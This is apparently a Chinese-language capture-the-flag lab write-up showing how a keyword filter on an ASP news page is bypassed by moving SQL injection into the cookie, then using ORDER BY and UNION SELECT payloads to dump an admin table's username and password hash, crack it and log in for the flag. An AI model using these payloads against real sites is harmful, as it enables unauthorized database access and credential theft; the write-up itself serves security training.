1，随便选择一则新闻，同样判断是否存在SQL注入发现存在and update delete ; insert mid master限制

and update delete ; insert mid master 等非法字符！

http://kypt8004.ia.aqlab.cn/shownews.asp?id=171 order by 2可以先判断字段数，存在十个字段

2，关键字拦截，可以尝试在cookie中传入，注意空格要用+代替，使用插件Modhearder可以改变cookie

首先在值的位置输入id=171+union+select+1,2,3,4,5,6,7,8,9,10数据库报错，再次尝试id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin是否存在admin表，存在admin在数据库中，并且23789五处回显点。

3，（查的其他破解方法好像都是直接知道列名是username和password的，不知道咋出来的列名，information_schema表格无法查询，只能查询admin）查找username和password列id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

username为admin，password为b9a2a2b5dffb918cb9a2a2b5dffb918c flag错误，进行解密

welcome，welcome也提交失败，尝试别的方法welcome是password可以扫一下是否有登录页面

存在登录页面，输入账号，密码

拿到flag是zkz{welcome-control}

通关成功！！！！